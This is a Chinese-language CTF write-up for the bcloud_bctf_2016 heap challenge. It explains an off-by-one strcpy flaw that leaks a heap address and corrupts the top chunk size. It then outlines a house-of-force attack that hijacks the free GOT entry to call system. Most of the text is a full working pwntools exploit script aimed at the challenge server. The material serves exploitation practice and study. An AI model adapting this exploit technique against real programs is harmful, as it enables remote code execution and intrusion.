bcloud_bctf_2016:
参考师傅:https://blog.csdn.net/seaaseesa/article/details/105588058
https://www.cnblogs.com/LynneHuan/p/14616450.html#bcloud_bctf_2016
漏洞分析:
漏洞出现在strcpy那里
如果填满0x40个‘a’,strcpy最后添加的\x00会在v2处,v2是后赋值,指针覆盖了\x00
strcpy接收v2的值直到\x00或换行,但没有\x00,所以接着泄露了堆的地址
还有也是利用了strcpy,原理也大致类似,让它没了\x00,能控制top_chunk_size
大致思路:
1.利用漏洞泄露堆地址,修改top_chunk_size为0xffffffff
2.计算出偏移(偏移=target_addr - top_chunk_ptr - 两个chunk头)
3.运用house of force分配到target_addr,这里为bss段的指针数组
4.改指针,劫持free got泄露libc,再劫持free got为system,并在指针数组里有个指向/bin/sh的指针,并写入/bin/sh
exp:
from pwn import *
#from LibcSearcher import *
local_file = './bcloud_bctf_2016'
local_libc = './libc-2.23.so'
remote_libc = './libc-2.23.so'
#remote_libc = '/home/glibc-all-in-one/libs/buu/libc-2.23.so'
select = 1
if select == 0:
r = process(local_file)
libc = ELF(local_libc)
else:
r = remote('node4.buuoj.cn',27684 )
libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se = lambda data :r.send(data)
sa = lambda delim,data :r.sendafter(delim, data)
sl = lambda data :r.sendline(data)
sla = lambda delim,data :r.sendlineafter(delim, data)
sea = lambda delim,data :r.sendafter(delim, data)
rc = lambda numb=4096 :r.recv(numb)
rl = lambda :r.recvline()
ru = lambda delims :r.recvuntil(delims)
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
info = lambda tag, addr :r.info(tag + ': {:#x}'.format(addr))
o_g_32_old = [0x3ac3c, 0x3ac3e, 0x3ac42, 0x3ac49, 0x5faa5, 0x5faa6]
o_g_32 = [0x3ac6c, 0x3ac6e, 0x3ac72, 0x3ac79, 0x5fbd5, 0x5fbd6]
o_g_old = [0x45216,0x4526a,0xf02a4,0xf1147]
o_g = [0x45226, 0x4527a, 0xf0364, 0xf1207]
def debug(cmd=''):
gdb.attach(r,cmd)
#-------------------------------
def add(size,content):
sla('option--->>\n','1')
sla('Input the length of the note content:\n',str(size))
sa('Input the content:\n',content)
def edit(index,content):
sla('option--->>\n','3')
sla('Input the id:',str(index))
sa('Input the new content:',content)
def delete(index):
sla('option--->>\n','4')
sla('Input the id:\n',str(index))
#--------------------------------------
sa('Input your name:\n','a'*0x40)
ru('a'*0x40)
heap_addr=u32(rc(4))
print hex(heap_addr)
sa('Org:\n','b'*0x40)
sla('Host:\n',p32(0xFFFFFFFF))
top_chunk_ptr=heap_addr+0xd0
heap_array_addr = 0x0804B120
offest=heap_array_addr-top_chunk_ptr-0x10
add(offest,'')#0
add(0x18,'\n')
edit(1,p32(0) + p32(elf.got['free']) + p32(elf.got['puts']) + p32(0x0804B130) + '/bin/sh\x00')
edit(1,p32(elf.plt['puts']) + '\n')
delete(2)
#rc(1)
libc_base=u32(rc(4))-libc.sym['puts']
print hex(libc_base)
system=libc_base+libc.sym['system']
edit(1,p32(system) + '\n')
delete(3)
#debug()
r.interactive()